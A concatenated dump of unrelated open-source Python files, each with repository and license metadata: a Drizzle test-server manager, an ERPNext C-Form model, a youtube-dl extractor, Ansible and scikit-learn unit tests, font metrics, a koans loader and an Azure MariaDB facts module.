, "--innodb.data-file-path=ibdata1:20M:autoextend"
, "--sort-buffer-size=256K"
, "--max-heap-table-size=1M"
, "--mysql-unix-socket-protocol.path=%s" %(self.socket_file)
, "--pid-file=%s" %(self.pid_file)
, "--drizzle-protocol.port=%d" %(self.drizzle_tcp_port)
, "--default-storage-engine=%s" %(self.default_storage_engine)
, "--datadir=%s" %(self.datadir)
, "--tmpdir=%s" %(self.tmpdir)
, self.secure_file_string
, self.user_string
]
if self.gdb:
server_args.append('--gdb')
return self.system_manager.handle_gdb_reqs(self, server_args)
else:
return "%s %s %s & " % ( self.cmd_prefix
, self.server_path
, " ".join(server_args)
)
def get_stop_cmd(self):
""" Return the command that will shut us down """
return "%s --user=root --port=%d --connect-timeout=5 --silent --password= --shutdown " %(self.drizzle_client_path, self.master_port)
def get_ping_cmd(self):
"""Return the command string that will
ping / check if the server is alive
"""
return "%s --ping --port=%d --user=root" % (self.drizzle_client_path, self.master_port)
def is_started(self):
""" Determine if the server is up and running -
this may vary from server type to server type
"""
# We experiment with waiting for a pid file to be created vs. pinging
# This is what test-run.pl does and it helps us pass logging_stats tests
# while not self.ping_server(server, quiet=True) and timer != timeout:
return self.system_manager.find_path( [self.pid_file]
, required=0)
def create_slave_config_file(self):
""" Create a config file suitable for use
with the slave-plugin. This allows
us to tie other servers in easily
"""
config_data = [ "[master1]"
, "master-host=127.0.0.1"
, "master-port=%d" %self.master_port
, "master-user=root"
, "master-pass=''"
, "max-reconnects=100"
#, "seconds-between-reconnects=20"
]
outfile = open(self.slave_config_file,'w')
for line in config_data:
outfile.write("%s\n" %(line))
outfile.close()
| kraziegent/mysql-5.6 | xtrabackup/test/kewpie/lib/server_mgmt/drizzled.py | Python | gpl-2.0 | 9,584 |
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import flt
from frappe import _
from frappe.model.document import Document
class CForm(Document):
def validate(self):
"""Validate invoice that c-form is applicable
and no other c-form is received for that"""
for d in self.get('invoice_details'):
if d.invoice_no:
inv = frappe.db.sql("""select c_form_applicable, c_form_no from
`tabSales Invoice` where name = %s and docstatus = 1""", d.invoice_no)
if inv and inv[0][0] != 'Yes':
frappe.throw("C-form is not applicable for Invoice: %s" % d.invoice_no)
elif inv and inv[0][1] and inv[0][1] != self.name:
frappe.throw("""Invoice %s is tagged in another C-form: %s.
If you want to change C-form no for this invoice,
please remove invoice no from the previous c-form and then try again""" %
(d.invoice_no, inv[0][1]))
elif not inv:
frappe.throw("Row %s: Invoice %s is invalid, it might be cancelled / does not exist. \
Please enter a valid Invoice" % d.idx, d.invoice_no)
def on_update(self):
""" Update C-Form No on invoices"""
self.set_total_invoiced_amount()
def on_submit(self):
self.set_cform_in_sales_invoices()
def before_cancel(self):
# remove cform reference
frappe.db.sql("""update `tabSales Invoice` set c_form_no=null where c_form_no=%s""", self.name)
def set_cform_in_sales_invoices(self):
inv = [d.invoice_no for d in self.get('invoice_details')]
if inv:
frappe.db.sql("""update `tabSales Invoice` set c_form_no=%s, modified=%s where name in (%s)""" %
('%s', '%s', ', '.join(['%s'] * len(inv))), tuple([self.name, self.modified] + inv))
frappe.db.sql("""update `tabSales Invoice` set c_form_no = null, modified = %s
where name not in (%s) and ifnull(c_form_no, '') = %s""" %
('%s', ', '.join(['%s']*len(inv)), '%s'), tuple([self.modified] + inv + [self.name]))
else:
frappe.throw(_("Please enter atleast 1 invoice in the table"))
def set_total_invoiced_amount(self):
total = sum([flt(d.grand_total) for d in self.get('invoice_details')])
frappe.db.set(self, 'total_invoiced_amount', total)
def get_invoice_details(self, invoice_no):
""" Pull details from invoices for referrence """
if invoice_no:
inv = frappe.db.get_value("Sales Invoice", invoice_no,
["posting_date", "territory", "net_total", "grand_total"], as_dict=True)
return {
'invoice_date' : inv.posting_date,
'territory' : inv.territory,
'net_total' : inv.net_total,
'grand_total' : inv.grand_total
}
| suyashphadtare/sajil-final-erp | erpnext/erpnext/accounts/doctype/c_form/c_form.py | Python | agpl-3.0 | 2,694 |
# encoding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
float_or_none,
parse_age_limit,
)
class TvigleIE(InfoExtractor):
IE_NAME = 'tvigle'
IE_DESC = 'Интернет-телевидение Tvigle.ru'
_VALID_URL = r'http://(?:www\.)?tvigle\.ru/(?:[^/]+/)+(?P<id>[^/]+)/$'
_TESTS = [
{
'url': 'http://www.tvigle.ru/video/sokrat/',
'md5': '36514aed3657d4f70b4b2cef8eb520cd',
'info_dict': {
'id': '1848932',
'display_id': 'sokrat',
'ext': 'flv',
'title': 'Сократ',
'description': 'md5:a05bd01be310074d5833efc6743be95e',
'duration': 6586,
'age_limit': 0,
},
},
{
'url': 'http://www.tvigle.ru/video/vladimir-vysotskii/vedushchii-teleprogrammy-60-minut-ssha-o-vladimire-vysotskom/',
'md5': 'd9012d7c7c598fe7a11d7fb46dc1f574',
'info_dict': {
'id': '5142516',
'ext': 'mp4',
'title': 'Ведущий телепрограммы «60 минут» (США) о Владимире Высоцком',
'description': 'md5:027f7dc872948f14c96d19b4178428a4',
'duration': 186.080,
'age_limit': 0,
},
},
]
def _real_extract(self, url):
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id)
video_id = self._html_search_regex(
r'<li class="video-preview current_playing" id="(\d+)">', webpage, 'video id')
video_data = self._download_json(
'http://cloud.tvigle.ru/api/play/video/%s/' % video_id, display_id)
item = video_data['playlist']['items'][0]
title = item['title']
description = item['description']
thumbnail = item['thumbnail']
duration = float_or_none(item.get('durationMilliseconds'), 1000)
age_limit = parse_age_limit(item.get('ageRestrictions'))
formats = []
for vcodec, fmts in item['videos'].items():
for quality, video_url in fmts.items():
formats.append({
'url': video_url,
'format_id': '%s-%s' % (vcodec, quality),
'vcodec': vcodec,
'height': int(quality[:-1]),
'filesize': item['video_files_size'][vcodec][quality],
})
self._sort_formats(formats)
return {
'id': video_id,
'display_id': display_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'age_limit': age_limit,
'formats': formats,
}
| 0x7678/youtube-dl | youtube_dl/extractor/tvigle.py | Python | unlicense | 2,889 |
import mock
import pytest
import yaml
import inspect
import collections
from ansible.module_utils.six import string_types
from ansible.modules.cloud.openstack import os_server
class AnsibleFail(Exception):
pass
class AnsibleExit(Exception):
pass
def params_from_doc(func):
'''This function extracts the docstring from the specified function,
parses it as a YAML document, and returns parameters for the os_server
module.'''
doc = inspect.getdoc(func)
cfg = yaml.load(doc)
for task in cfg:
for module, params in task.items():
for k, v in params.items():
if k in ['nics'] and isinstance(v, string_types):
params[k] = [v]
task[module] = collections.defaultdict(str,
params)
return cfg[0]['os_server']
class FakeCloud (object):
ports = [
{'name': 'port1', 'id': '1234'},
{'name': 'port2', 'id': '4321'},
]
networks = [
{'name': 'network1', 'id': '5678'},
{'name': 'network2', 'id': '8765'},
]
images = [
{'name': 'cirros', 'id': '1'},
{'name': 'fedora', 'id': '2'},
]
flavors = [
{'name': 'm1.small', 'id': '1', 'flavor_ram': 1024},
{'name': 'm1.tiny', 'id': '2', 'flavor_ram': 512},
]
def _find(self, source, name):
for item in source:
if item['name'] == name or item['id'] == name:
return item
def get_image_id(self, name, exclude=None):
image = self._find(self.images, name)
if image:
return image['id']
def get_flavor(self, name):
return self._find(self.flavors, name)
def get_flavor_by_ram(self, ram, include=None):
for flavor in self.flavors:
if flavor['ram'] >= ram and (include is None or include in
flavor['name']):
return flavor
def get_port(self, name):
return self._find(self.ports, name)
def get_network(self, name):
return self._find(self.networks, name)
create_server = mock.MagicMock()
class TestNetworkArgs(object):
'''This class exercises the _network_args function of the
os_server module. For each test, we parse the YAML document
contained in the docstring to retrieve the module parameters for the
test.'''
def setup_method(self, method):
self.cloud = FakeCloud()
self.module = mock.MagicMock()
self.module.params = params_from_doc(method)
def test_nics_string_net_id(self):
'''
- os_server:
nics: net-id=1234
'''
args = os_server._network_args(self.module, self.cloud)
assert(args[0]['net-id'] == '1234')
def test_nics_string_net_id_list(self):
'''
- os_server:
nics: net-id=1234,net-id=4321
'''
args = os_server._network_args(self.module, self.cloud)
assert(args[0]['net-id'] == '1234')
assert(args[1]['net-id'] == '4321')
def test_nics_string_port_id(self):
'''
- os_server:
nics: port-id=1234
'''
args = os_server._network_args(self.module, self.cloud)
assert(args[0]['port-id'] == '1234')
def test_nics_string_net_name(self):
'''
- os_server:
nics: net-name=network1
'''
args = os_server._network_args(self.module, self.cloud)
assert(args[0]['net-id'] == '5678')
def test_nics_string_port_name(self):
'''
- os_server:
nics: port-name=port1
'''
args = os_server._network_args(self.module, self.cloud)
assert(args[0]['port-id'] == '1234')
def test_nics_structured_net_id(self):
'''
- os_server:
nics:
- net-id: '1234'
'''
args = os_server._network_args(self.module, self.cloud)
assert(args[0]['net-id'] == '1234')
def test_nics_structured_mixed(self):
'''
- os_server:
nics:
- net-id: '1234'
- port-name: port1
- 'net-name=network1,port-id=4321'
'''
args = os_server._network_args(self.module, self.cloud)
assert(args[0]['net-id'] == '1234')
assert(args[1]['port-id'] == '1234')
assert(args[2]['net-id'] == '5678')
assert(args[3]['port-id'] == '4321')
class TestCreateServer(object):
def setup_method(self, method):
self.cloud = FakeCloud()
self.module = mock.MagicMock()
self.module.params = params_from_doc(method)
self.module.fail_json.side_effect = AnsibleFail()
self.module.exit_json.side_effect = AnsibleExit()
self.meta = mock.MagicMock()
self.meta.gett_hostvars_from_server.return_value = {
'id': '1234'
}
os_server.meta = self.meta
def test_create_server(self):
'''
- os_server:
image: cirros
flavor: m1.tiny
nics:
- net-name: network1
meta:
- key: value
'''
with pytest.raises(AnsibleExit):
os_server._create_server(self.module, self.cloud)
assert(self.cloud.create_server.call_count == 1)
assert(self.cloud.create_server.call_args[1]['image']
== self.cloud.get_image_id('cirros'))
assert(self.cloud.create_server.call_args[1]['flavor']
== self.cloud.get_flavor('m1.tiny')['id'])
assert(self.cloud.create_server.call_args[1]['nics'][0]['net-id']
== self.cloud.get_network('network1')['id'])
def test_create_server_bad_flavor(self):
'''
- os_server:
image: cirros
flavor: missing_flavor
nics:
- net-name: network1
'''
with pytest.raises(AnsibleFail):
os_server._create_server(self.module, self.cloud)
assert('missing_flavor' in
self.module.fail_json.call_args[1]['msg'])
def test_create_server_bad_nic(self):
'''
- os_server:
image: cirros
flavor: m1.tiny
nics:
- net-name: missing_network
'''
with pytest.raises(AnsibleFail):
os_server._create_server(self.module, self.cloud)
assert('missing_network' in
self.module.fail_json.call_args[1]['msg'])
| britcey/ansible | test/units/modules/cloud/openstack/test_os_server.py | Python | gpl-3.0 | 6,519 |
# Authors: Emmanuelle Gouillart <[email protected]>
# Gael Varoquaux <[email protected]>
# License: BSD 3 clause
import numpy as np
import scipy as sp
from scipy import ndimage
from nose.tools import assert_equal, assert_true
from numpy.testing import assert_raises
from sklearn.feature_extraction.image import (
img_to_graph, grid_to_graph, extract_patches_2d,
reconstruct_from_patches_2d, PatchExtractor, extract_patches)
from sklearn.utils.graph import connected_components
from sklearn.utils.testing import SkipTest
from sklearn.utils.fixes import sp_version
if sp_version < (0, 12):
raise SkipTest("Skipping because SciPy version earlier than 0.12.0 and "
"thus does not include the scipy.misc.face() image.")
def test_img_to_graph():
x, y = np.mgrid[:4, :4] - 10
grad_x = img_to_graph(x)
grad_y = img_to_graph(y)
assert_equal(grad_x.nnz, grad_y.nnz)
# Negative elements are the diagonal: the elements of the original
# image. Positive elements are the values of the gradient, they
# should all be equal on grad_x and grad_y
np.testing.assert_array_equal(grad_x.data[grad_x.data > 0],
grad_y.data[grad_y.data > 0])
def test_grid_to_graph():
# Checking that the function works with graphs containing no edges
size = 2
roi_size = 1
# Generating two convex parts with one vertex
# Thus, edges will be empty in _to_graph
mask = np.zeros((size, size), dtype=np.bool)
mask[0:roi_size, 0:roi_size] = True
mask[-roi_size:, -roi_size:] = True
mask = mask.reshape(size ** 2)
A = grid_to_graph(n_x=size, n_y=size, mask=mask, return_as=np.ndarray)
assert_true(connected_components(A)[0] == 2)
# Checking that the function works whatever the type of mask is
mask = np.ones((size, size), dtype=np.int16)
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask)
assert_true(connected_components(A)[0] == 1)
# Checking dtype of the graph
mask = np.ones((size, size))
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask, dtype=np.bool)
assert_true(A.dtype == np.bool)
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask, dtype=np.int)
assert_true(A.dtype == np.int)
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask,
dtype=np.float64)
assert_true(A.dtype == np.float64)
def test_connect_regions():
try:
face = sp.face(gray=True)
except AttributeError:
# Newer versions of scipy have face in misc
from scipy import misc
face = misc.face(gray=True)
for thr in (50, 150):
mask = face > thr
graph = img_to_graph(face, mask)
assert_equal(ndimage.label(mask)[1], connected_components(graph)[0])
def test_connect_regions_with_grid():
try:
face = sp.face(gray=True)
except AttributeError:
# Newer versions of scipy have face in misc
from scipy import misc
face = misc.face(gray=True)
mask = face > 50
graph = grid_to_graph(*face.shape, mask=mask)
assert_equal(ndimage.label(mask)[1], connected_components(graph)[0])
mask = face > 150
graph = grid_to_graph(*face.shape, mask=mask, dtype=None)
assert_equal(ndimage.label(mask)[1], connected_components(graph)[0])
def _downsampled_face():
try:
face = sp.face(gray=True)
except AttributeError:
# Newer versions of scipy have face in misc
from scipy import misc
face = misc.face(gray=True)
face = face.astype(np.float32)
face = (face[::2, ::2] + face[1::2, ::2] + face[::2, 1::2]
+ face[1::2, 1::2])
face = (face[::2, ::2] + face[1::2, ::2] + face[::2, 1::2]
+ face[1::2, 1::2])
face = face.astype(np.float32)
face /= 16.0
return face
def _orange_face(face=None):
face = _downsampled_face() if face is None else face
face_color = np.zeros(face.shape + (3,))
face_color[:, :, 0] = 256 - face
face_color[:, :, 1] = 256 - face / 2
face_color[:, :, 2] = 256 - face / 4
return face_color
def _make_images(face=None):
face = _downsampled_face() if face is None else face
# make a collection of faces
images = np.zeros((3,) + face.shape)
images[0] = face
images[1] = face + 1
images[2] = face + 2
return images
downsampled_face = _downsampled_face()
orange_face = _orange_face(downsampled_face)
face_collection = _make_images(downsampled_face)
def test_extract_patches_all():
face = downsampled_face
i_h, i_w = face.shape
p_h, p_w = 16, 16
expected_n_patches = (i_h - p_h + 1) * (i_w - p_w + 1)
patches = extract_patches_2d(face, (p_h, p_w))
assert_equal(patches.shape, (expected_n_patches, p_h, p_w))
def test_extract_patches_all_color():
face = orange_face
i_h, i_w = face.shape[:2]
p_h, p_w = 16, 16
expected_n_patches = (i_h - p_h + 1) * (i_w - p_w + 1)
patches = extract_patches_2d(face, (p_h, p_w))
assert_equal(patches.shape, (expected_n_patches, p_h, p_w, 3))
def test_extract_patches_all_rect():
face = downsampled_face
face = face[:, 32:97]
i_h, i_w = face.shape
p_h, p_w = 16, 12
expected_n_patches = (i_h - p_h + 1) * (i_w - p_w + 1)
patches = extract_patches_2d(face, (p_h, p_w))
assert_equal(patches.shape, (expected_n_patches, p_h, p_w))
def test_extract_patches_max_patches():
face = downsampled_face
i_h, i_w = face.shape
p_h, p_w = 16, 16
patches = extract_patches_2d(face, (p_h, p_w), max_patches=100)
assert_equal(patches.shape, (100, p_h, p_w))
expected_n_patches = int(0.5 * (i_h - p_h + 1) * (i_w - p_w + 1))
patches = extract_patches_2d(face, (p_h, p_w), max_patches=0.5)
assert_equal(patches.shape, (expected_n_patches, p_h, p_w))
assert_raises(ValueError, extract_patches_2d, face, (p_h, p_w),
max_patches=2.0)
assert_raises(ValueError, extract_patches_2d, face, (p_h, p_w),
max_patches=-1.0)
def test_reconstruct_patches_perfect():
face = downsampled_face
p_h, p_w = 16, 16
patches = extract_patches_2d(face, (p_h, p_w))
face_reconstructed = reconstruct_from_patches_2d(patches, face.shape)
np.testing.assert_array_almost_equal(face, face_reconstructed)
def test_reconstruct_patches_perfect_color():
face = orange_face
p_h, p_w = 16, 16
patches = extract_patches_2d(face, (p_h, p_w))
face_reconstructed = reconstruct_from_patches_2d(patches, face.shape)
np.testing.assert_array_almost_equal(face, face_reconstructed)
def test_patch_extractor_fit():
faces = face_collection
extr = PatchExtractor(patch_size=(8, 8), max_patches=100, random_state=0)
assert_true(extr == extr.fit(faces))
def test_patch_extractor_max_patches():
faces = face_collection
i_h, i_w = faces.shape[1:3]
p_h, p_w = 8, 8
max_patches = 100
expected_n_patches = len(faces) * max_patches
extr = PatchExtractor(patch_size=(p_h, p_w), max_patches=max_patches,
random_state=0)
patches = extr.transform(faces)
assert_true(patches.shape == (expected_n_patches, p_h, p_w))
max_patches = 0.5
expected_n_patches = len(faces) * int((i_h - p_h + 1) * (i_w - p_w + 1)
* max_patches)
extr = PatchExtractor(patch_size=(p_h, p_w), max_patches=max_patches,
random_state=0)
patches = extr.transform(faces)
assert_true(patches.shape == (expected_n_patches, p_h, p_w))
def test_patch_extractor_max_patches_default():
faces = face_collection
extr = PatchExtractor(max_patches=100, random_state=0)
patches = extr.transform(faces)
assert_equal(patches.shape, (len(faces) * 100, 19, 25))
def test_patch_extractor_all_patches():
faces = face_collection
i_h, i_w = faces.shape[1:3]
p_h, p_w = 8, 8
expected_n_patches = len(faces) * (i_h - p_h + 1) * (i_w - p_w + 1)
extr = PatchExtractor(patch_size=(p_h, p_w), random_state=0)
patches = extr.transform(faces)
assert_true(patches.shape == (expected_n_patches, p_h, p_w))
def test_patch_extractor_color():
faces = _make_images(orange_face)
i_h, i_w = faces.shape[1:3]
p_h, p_w = 8, 8
expected_n_patches = len(faces) * (i_h - p_h + 1) * (i_w - p_w + 1)
extr = PatchExtractor(patch_size=(p_h, p_w), random_state=0)
patches = extr.transform(faces)
assert_true(patches.shape == (expected_n_patches, p_h, p_w, 3))
def test_extract_patches_strided():
image_shapes_1D = [(10,), (10,), (11,), (10,)]
patch_sizes_1D = [(1,), (2,), (3,), (8,)]
patch_steps_1D = [(1,), (1,), (4,), (2,)]
expected_views_1D = [(10,), (9,), (3,), (2,)]
last_patch_1D = [(10,), (8,), (8,), (2,)]
image_shapes_2D = [(10, 20), (10, 20), (10, 20), (11, 20)]
patch_sizes_2D = [(2, 2), (10, 10), (10, 11), (6, 6)]
patch_steps_2D = [(5, 5), (3, 10), (3, 4), (4, 2)]
expected_views_2D = [(2, 4), (1, 2), (1, 3), (2, 8)]
last_patch_2D = [(5, 15), (0, 10), (0, 8), (4, 14)]
image_shapes_3D = [(5, 4, 3), (3, 3, 3), (7, 8, 9), (7, 8, 9)]
patch_sizes_3D = [(2, 2, 3), (2, 2, 2), (1, 7, 3), (1, 3, 3)]
patch_steps_3D = [(1, 2, 10), (1, 1, 1), (2, 1, 3), (3, 3, 4)]
expected_views_3D = [(4, 2, 1), (2, 2, 2), (4, 2, 3), (3, 2, 2)]
last_patch_3D = [(3, 2, 0), (1, 1, 1), (6, 1, 6), (6, 3, 4)]
image_shapes = image_shapes_1D + image_shapes_2D + image_shapes_3D
patch_sizes = patch_sizes_1D + patch_sizes_2D + patch_sizes_3D
patch_steps = patch_steps_1D + patch_steps_2D + patch_steps_3D
expected_views = expected_views_1D + expected_views_2D + expected_views_3D
last_patches = last_patch_1D + last_patch_2D + last_patch_3D
for (image_shape, patch_size, patch_step, expected_view,
last_patch) in zip(image_shapes, patch_sizes, patch_steps,
expected_views, last_patches):
image = np.arange(np.prod(image_shape)).reshape(image_shape)
patches = extract_patches(image, patch_shape=patch_size,
extraction_step=patch_step)
ndim = len(image_shape)
assert_true(patches.shape[:ndim] == expected_view)
last_patch_slices = [slice(i, i + j, None) for i, j in
zip(last_patch, patch_size)]
assert_true((patches[[slice(-1, None, None)] * ndim] ==
image[last_patch_slices].squeeze()).all())
def test_extract_patches_square():
# test same patch size for all dimensions
face = downsampled_face
i_h, i_w = face.shape
p = 8
expected_n_patches = ((i_h - p + 1), (i_w - p + 1))
patches = extract_patches(face, patch_shape=p)
assert_true(patches.shape == (expected_n_patches[0], expected_n_patches[1],
p, p))
def test_width_patch():
# width and height of the patch should be less than the image
x = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
assert_raises(ValueError, extract_patches_2d, x, (4, 1))
assert_raises(ValueError, extract_patches_2d, x, (1, 4))
| toastedcornflakes/scikit-learn | sklearn/feature_extraction/tests/test_image.py | Python | bsd-3-clause | 11,187 |
type='TrueType'
name='Calligrapher-Regular'
desc={'Ascent':899,'Descent':-234,'CapHeight':731,'Flags':32,'FontBBox':'[-50 -234 1328 899]','ItalicAngle':0,'StemV':70,'MissingWidth':800}
up=-200
ut=20
cw={
'\x00':800,'\x01':800,'\x02':800,'\x03':800,'\x04':800,'\x05':800,'\x06':800,'\x07':800,'\x08':800,'\t':800,'\n':800,'\x0b':800,'\x0c':800,'\r':800,'\x0e':800,'\x0f':800,'\x10':800,'\x11':800,'\x12':800,'\x13':800,'\x14':800,'\x15':800,
'\x16':800,'\x17':800,'\x18':800,'\x19':800,'\x1a':800,'\x1b':800,'\x1c':800,'\x1d':800,'\x1e':800,'\x1f':800,' ':282,'!':324,'"':405,'#':584,'$':632,'%':980,'&':776,'\'':259,'(':299,')':299,'*':377,'+':600,
',':259,'-':432,'.':254,'/':597,'0':529,'1':298,'2':451,'3':359,'4':525,'5':423,'6':464,'7':417,'8':457,'9':479,':':275,';':282,'<':600,'=':600,'>':600,'?':501,'@':800,'A':743,
'B':636,'C':598,'D':712,'E':608,'F':562,'G':680,'H':756,'I':308,'J':314,'K':676,'L':552,'M':1041,'N':817,'O':729,'P':569,'Q':698,'R':674,'S':618,'T':673,'U':805,'V':753,'W':1238,
'X':716,'Y':754,'Z':599,'[':315,'\\':463,']':315,'^':600,'_':547,'`':278,'a':581,'b':564,'c':440,'d':571,'e':450,'f':347,'g':628,'h':611,'i':283,'j':283,'k':560,'l':252,'m':976,
'n':595,'o':508,'p':549,'q':540,'r':395,'s':441,'t':307,'u':614,'v':556,'w':915,'x':559,'y':597,'z':452,'{':315,'|':222,'}':315,'~':600,'\x7f':800,'\x80':800,'\x81':800,'\x82':0,'\x83':0,
'\x84':0,'\x85':780,'\x86':0,'\x87':0,'\x88':278,'\x89':0,'\x8a':0,'\x8b':0,'\x8c':1064,'\x8d':800,'\x8e':800,'\x8f':800,'\x90':800,'\x91':259,'\x92':259,'\x93':470,'\x94':470,'\x95':500,'\x96':300,'\x97':600,'\x98':278,'\x99':990,
'\x9a':0,'\x9b':0,'\x9c':790,'\x9d':800,'\x9e':800,'\x9f':754,'\xa0':282,'\xa1':324,'\xa2':450,'\xa3':640,'\xa4':518,'\xa5':603,'\xa6':0,'\xa7':519,'\xa8':254,'\xa9':800,'\xaa':349,'\xab':0,'\xac':0,'\xad':432,'\xae':800,'\xaf':278,
'\xb0':0,'\xb1':0,'\xb2':0,'\xb3':0,'\xb4':278,'\xb5':614,'\xb6':0,'\xb7':254,'\xb8':278,'\xb9':0,'\xba':305,'\xbb':0,'\xbc':0,'\xbd':0,'\xbe':0,'\xbf':501,'\xc0':743,'\xc1':743,'\xc2':743,'\xc3':743,'\xc4':743,'\xc5':743,
'\xc6':1060,'\xc7':598,'\xc8':608,'\xc9':608,'\xca':608,'\xcb':608,'\xcc':308,'\xcd':308,'\xce':308,'\xcf':308,'\xd0':0,'\xd1':817,'\xd2':729,'\xd3':729,'\xd4':729,'\xd5':729,'\xd6':729,'\xd7':0,'\xd8':729,'\xd9':805,'\xda':805,'\xdb':805,
'\xdc':805,'\xdd':0,'\xde':0,'\xdf':688,'\xe0':581,'\xe1':581,'\xe2':581,'\xe3':581,'\xe4':581,'\xe5':581,'\xe6':792,'\xe7':440,'\xe8':450,'\xe9':450,'\xea':450,'\xeb':450,'\xec':283,'\xed':283,'\xee':283,'\xef':283,'\xf0':800,'\xf1':595,
'\xf2':508,'\xf3':508,'\xf4':508,'\xf5':508,'\xf6':508,'\xf7':0,'\xf8':508,'\xf9':614,'\xfa':614,'\xfb':614,'\xfc':614,'\xfd':0,'\xfe':0,'\xff':597}
enc='cp1252'
diff=''
filename='calligra.z'
originalsize=40120
| sesuncedu/bitcurator | tools/py3fpdf/attic/font/calligra.py | Python | gpl-3.0 | 2,763 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Functions to load the test cases ("koans") that make up the
Path to Enlightenment.
'''
import io
import unittest
# The path to enlightenment starts with the following:
KOANS_FILENAME = 'koans.txt'
def filter_koan_names(lines):
'''
Strips leading and trailing whitespace, then filters out blank
lines and comment lines.
'''
for line in lines:
line = line.strip()
if line.startswith('#'):
continue
if line:
yield line
return
def names_from_file(filename):
'''
Opens the given ``filename`` and yields the fully-qualified names
of TestCases found inside (one per line).
'''
with io.open(filename, 'rt', encoding='utf8') as names_file:
for name in filter_koan_names(names_file):
yield name
return
def koans_suite(names):
'''
Returns a ``TestSuite`` loaded with all tests found in the given
``names``, preserving the order in which they are found.
'''
suite = unittest.TestSuite()
loader = unittest.TestLoader()
loader.sortTestMethodsUsing = None
for name in names:
tests = loader.loadTestsFromName(name)
suite.addTests(tests)
return suite
def koans(filename=KOANS_FILENAME):
'''
Returns a ``TestSuite`` loaded with all the koans (``TestCase``s)
listed in ``filename``.
'''
names = names_from_file(filename)
return koans_suite(names)
| haroldtreen/python_koans | runner/path_to_enlightenment.py | Python | mit | 1,482 |
#!/usr/bin/python
#
# Copyright (c) 2017 Zim Kalinowski, <[email protected]>
# Copyright (c) 2019 Matti Ranta, (@techknowlogick)
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_mariadbdatabase_info
version_added: "2.9"
short_description: Get Azure MariaDB Database facts
description:
- Get facts of MariaDB Database.
options:
resource_group:
description:
- The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
required: True
type: str
server_name:
description:
- The name of the server.
required: True
type: str
name:
description:
- The name of the database.
type: str
extends_documentation_fragment:
- azure
author:
- Zim Kalinowski (@zikalino)
- Matti Ranta (@techknowlogick)
'''
EXAMPLES = '''
- name: Get instance of MariaDB Database
azure_rm_mariadbdatabase_info:
resource_group: myResourceGroup
server_name: server_name
name: database_name
- name: List instances of MariaDB Database
azure_rm_mariadbdatabase_info:
resource_group: myResourceGroup
server_name: server_name
'''
RETURN = '''
databases:
description:
- A list of dictionaries containing facts for MariaDB Databases.
returned: always
type: complex
contains:
id:
description:
- Resource ID.
returned: always
type: str
sample: "/subscriptions/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/resourceGroups/myResourceGroup/providers/Microsoft.DBforMariaDB/servers/testser
ver/databases/db1"
resource_group:
description:
- Resource group name.
returned: always
type: str
sample: testrg
server_name:
description:
- Server name.
returned: always
type: str
sample: testserver
name:
description:
- Resource name.
returned: always
type: str
sample: db1
charset:
description:
- The charset of the database.
returned: always
type: str
sample: UTF8
collation:
description:
- The collation of the database.
returned: always
type: str
sample: English_United States.1252
'''
from ansible.module_utils.azure_rm_common import AzureRMModuleBase
try:
from msrestazure.azure_exceptions import CloudError
from azure.mgmt.rdbms.mariadb import MariaDBManagementClient
from msrest.serialization import Model
except ImportError:
# This is handled in azure_rm_common
pass
class AzureRMMariaDbDatabaseInfo(AzureRMModuleBase):
def __init__(self):
# define user inputs into argument
self.module_arg_spec = dict(
resource_group=dict(
type='str',
required=True
),
server_name=dict(
type='str',
required=True
),
name=dict(
type='str'
)
)
# store the results of the module operation
self.results = dict(
changed=False
)
self.resource_group = None
self.server_name = None
self.name = None
super(AzureRMMariaDbDatabaseInfo, self).__init__(self.module_arg_spec, supports_tags=False)
def exec_module(self, **kwargs):
is_old_facts = self.module._name == 'azure_rm_mariadbdatabase_facts'
if is_old_facts:
self.module.deprecate("The 'azure_rm_mariadbdatabase_facts' module has been renamed to 'azure_rm_mariadbdatabase_info'", version='2.13')
for key in self.module_arg_spec:
setattr(self, key, kwargs[key])
if (self.resource_group is not None and
self.server_name is not None and
self.name is not None):
self.results['databases'] = self.get()
elif (self.resource_group is not None and
self.server_name is not None):
self.results['databases'] = self.list_by_server()
return self.results
def get(self):
response = None
results = []
try:
response = self.mariadb_client.databases.get(resource_group_name=self.resource_group,
server_name=self.server_name,
database_name=self.name)
self.log("Response : {0}".format(response))
except CloudError as e:
self.log('Could not get facts for Databases.')
if response is not None:
results.append(self.format_item(response))
return results
def list_by_server(self):
response = None
results = []
try:
response = self.mariadb_client.databases.list_by_server(resource_group_name=self.resource_group,
server_name=self.server_name)
self.log("Response : {0}".format(response))
except CloudError as e:
self.fail("Error listing for server {0} - {1}".format(self.server_name, str(e)))
if response is not None:
for item in response:
results.append(self.format_item(item))
return results
def format_item(self, item):
d = item.as_dict()
d = {
'resource_group': self.resource_group,
'server_name': self.server_name,
'name': d['name'],
'charset': d['charset'],
'collation': d['collation']
}
return d
def main():
AzureRMMariaDbDatabaseInfo()
if __name__ == '__main__':
main()
| ilpianista/ansible | test/support/integration/plugins/modules/azure_rm_mariadbdatabase_info.py | Python | gpl-3.0 | 6,304 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# Daniel Campos ([email protected]) Date: 07/10/2014
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
